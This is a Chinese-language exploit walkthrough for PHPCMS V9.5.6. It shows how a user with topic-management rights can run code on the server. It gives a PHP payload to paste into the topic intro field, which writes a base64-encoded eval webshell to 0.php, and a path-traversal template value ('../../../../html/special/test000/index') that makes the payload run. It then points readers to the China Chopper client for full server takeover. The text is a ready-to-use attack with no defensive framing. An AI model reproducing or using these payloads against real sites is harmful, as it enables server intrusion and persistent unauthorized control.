前提是需要有管理专题的权限
测试版本
PHPCMS程序版本:Phpcms V9.5.6 Release
过程
1. 添加专题
专题名称:test
专题横幅:/1.jpg
专题缩略图:/1.jpg
专题导读:<?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzVdKTs/Pg==')); ?>
生成静态:是
专题生成目录:test000
专题子分类:test test
其他默认 -> 提交
2. 再次添加专题
专题名称:test1
专题横幅:/1.jpg
专题缩略图:/1.jpg
专题导读:
生成静态:是
专题生成目录:test111
专题子分类:test test
扩展设置
专题模板:value设置为 ../../../../html/special/test000/index
其他默认 -> 提交
最后生成文件 0.php, 直接使用中国菜刀进行注入,即可获取服务器全部权限,不会使用中国菜刀的 ,自行咕狗,使用此类方法也可以进行PHP大马以及小马的注入,直接可以控制服务器后台。
